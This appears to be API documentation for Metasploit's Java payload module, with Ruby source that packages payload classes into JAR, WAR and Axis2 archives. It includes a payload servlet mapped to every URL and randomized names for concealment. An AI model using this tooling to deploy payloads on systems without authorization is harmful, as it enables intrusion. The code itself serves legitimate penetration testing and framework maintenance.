Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Constant Summary collapse

ForceDynamicCachedSize =

Mark the payload as dynamic as the generated JAR/zip files can differ in size depending on the host machine’s zlib version

true

Instance Method Summary collapse

Instance Method Details

#class_files ⇒ Object

Default to no extra class files



# File 'lib/msf/core/payload/java.rb', line 173

# Extra class files to bundle into the generated archive.
#
# This base implementation contributes none. The archive builders append
# whatever this returns to their own lists of path-part arrays, so an
# override presumably returns entries of the same shape
# (e.g. ['metasploit', 'Foo.class']) -- confirm against the including modules.
#
# @return [Array] an empty list
def class_files
  Array.new
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String



# File 'lib/msf/core/payload/java.rb', line 37

# Builds the payload JAR and returns it serialized as a String.
#
# Delegates archive construction to #generate_jar and then calls #pack on
# the resulting object.
#
# @param opts [Hash] passed through unchanged to #generate_jar
# @return [Object] whatever the jar's #pack returns (documented as a String)
def generate(opts={})
  jar = generate_jar(opts)
  jar.pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create an Axis2 web service file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload’s #stager_config method.

Parameters:

  • :app_name (Hash)

    a customizable set of options

Returns:

  • (Rex::Zip::Jar)


# File 'lib/msf/core/payload/java.rb', line 136

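# Builds an Axis2 web service archive as a Rex::Zip::Jar.
#
# The archive holds, in order: META-INF/services.xml (the service
# descriptor), the metasploit/ class files (Payload, PayloadServlet and
# anything returned by #class_files), and metasploit.dat containing the
# output of the payload's #stager_config.
#
# NOTE(review): app_name is interpolated into services.xml without XML
# escaping, so a value containing `<`, `&` or `"` yields a malformed
# descriptor.
#
# @param opts [Hash] options; also passed unchanged to #stager_config
# @option opts [String] :app_name service name; a random lowercase string
#   of 8..15 characters when omitted
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the receiver does not define #stager_config
def generate_axis2(opts={})
  # Fail with a descriptive message. A bare `raise` reports only
  # "unhandled exception" (or re-raises an unrelated $! when called from
  # inside a rescue), which hides the real cause.
  unless respond_to?(:stager_config)
    raise RuntimeError, "#{self.class} must define #stager_config to build an Axis2 archive"
  end

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Class bytes are looked up under java/<parts> and stored in the
    # archive under <parts>.
    source_path = ['java', path_parts].flatten.join('/')
    zip.add_file(path_parts.join('/'), ::MetasploitPayloads.read(source_path))
  end

  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(app_name: app_name)

  zip
end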

#generate_default_stage(opts = {}) ⇒ Object



# File 'lib/msf/core/payload/java.rb', line 23

# Serializes every file listed by #stage_class_files into one
# length-prefixed stream.
#
# Each file is read via MetasploitPayloads.read('java', path) and emitted
# as a 32-bit big-endian length followed by the raw data; a 32-bit zero
# terminates the stream.
#
# NOTE(review): the prefix uses String#length, which equals the byte count
# only if the data is binary-encoded -- confirm what
# MetasploitPayloads.read returns.
#
# @param opts [Hash] accepted for interface compatibility; not read here
# @return [String] the framed stage
def generate_default_stage(opts={})
  framed = stage_class_files.each_with_object('') do |class_path, buffer|
    class_data = MetasploitPayloads.read('java', class_path)
    buffer << [class_data.length, class_data].pack('NA*')
  end

  # Zero-length record marks the end of the class list.
  framed << [0].pack('N')
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload’s #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)


# File 'lib/msf/core/payload/java.rb', line 51

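# Builds the stager JAR as a Rex::Zip::Jar.
#
# The archive holds metasploit.dat (the output of the payload's
# #stager_config), metasploit/Payload.class, and any extra entries returned
# by #class_files. Class bytes are read through ::MetasploitPayloads.read
# from the java/ data directory.
#
# @param opts [Hash] options; also passed unchanged to #stager_config
# @option opts [String] :main_class Main-Class attribute for the manifest;
#   defaults to "metasploit.Payload" so wrappers around it can override it
# @option opts [Boolean] :random when truthy, calls Jar#add_sub("metasploit")
#   (documented as randomizing the "metasploit" package name)
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the receiver does not define #stager_config
def generate_jar(opts={})
  # Fail with a descriptive message. A bare `raise` reports only
  # "unhandled exception" (or re-raises an unrelated $! when called from
  # inside a rescue), which hides the real cause.
  unless respond_to?(:stager_config)
    raise RuntimeError, "#{self.class} must define #stager_config to build a jar"
  end

  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Class bytes are looked up under java/<parts> and stored in the
    # archive under <parts>.
    source_path = ['java', path_parts].flatten.join('/')
    jar.add_file(path_parts.join('/'), ::MetasploitPayloads.read(source_path))
  end

  jar.build_manifest(main_class: main_class)

  jar
end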

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

[ 32-bit big endian length ][ first raw .class file ]
...
[ 32-bit big endian length ][ Nth raw .class file ]
[ 32-bit null ]


# File 'lib/msf/core/payload/java.rb', line 19

# Entry point used by stages to produce the stage data.
#
# Java stages define #stage_class_files as an array of .class files located
# in data/java/. The staging protocol expects any number of class files,
# each preceded by its 32-bit big-endian length, followed by a 32-bit zero
# terminator. This implementation defers entirely to
# #generate_default_stage.
#
# @param opts [Hash] passed through unchanged
# @return [Object] whatever #generate_default_stage returns
def generate_stage(opts={})
  default_stage = generate_default_stage(opts)
  default_stage
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})
  • :app_name (Hash)

    a customizable set of options



# File 'lib/msf/core/payload/java.rb', line 85

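# Builds a WAR archive as a Rex::Zip::Jar.
#
# The archive holds WEB-INF/web.xml (one servlet mapped to /* and bound to
# metasploit.PayloadServlet), the class files under WEB-INF/classes/
# (Payload, PayloadServlet and anything returned by #class_files), and
# WEB-INF/classes/metasploit.dat containing the output of the payload's
# #stager_config.
#
# NOTE(review): app_name is placed into web.xml without XML escaping, so a
# value containing `<` or `&` yields a malformed descriptor.
#
# @param opts [Hash] options; also passed unchanged to #stager_config
# @option opts [String] :app_name servlet name; a random lowercase string
#   of 8..15 characters when omitted
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the receiver does not define #stager_config
def generate_war(opts={})
  # Fail with a descriptive message. A bare `raise` reports only
  # "unhandled exception" (or re-raises an unrelated $! when called from
  # inside a rescue), which hides the real cause.
  unless respond_to?(:stager_config)
    raise RuntimeError, "#{self.class} must define #stager_config to build a war"
  end

  zip = Rex::Zip::Jar.new

  web_xml_template = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  # Block form inserts app_name literally. With a replacement *string*,
  # gsub interprets backslash sequences such as \0, which would corrupt a
  # name containing a backslash. The non-bang form also leaves the
  # template literal untouched.
  web_xml = web_xml_template.gsub('NAME') { app_name }

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_file('WEB-INF/classes/metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Class bytes are looked up under java/<parts> and stored under
    # WEB-INF/classes/<parts>.
    source_path = ['java', path_parts].flatten.join('/')
    zip.add_file("WEB-INF/classes/" + path_parts.join('/'), ::MetasploitPayloads.read(source_path))
  end

  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end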

#stage_class_files ⇒ Object

Default to no extra stage class files



# File 'lib/msf/core/payload/java.rb', line 178

# Class files that make up the stage.
#
# This base implementation contributes none; Java stages are documented as
# defining this as an array of .class files located in data/java/.
#
# @return [Array] an empty list
def stage_class_files
  Array.new
end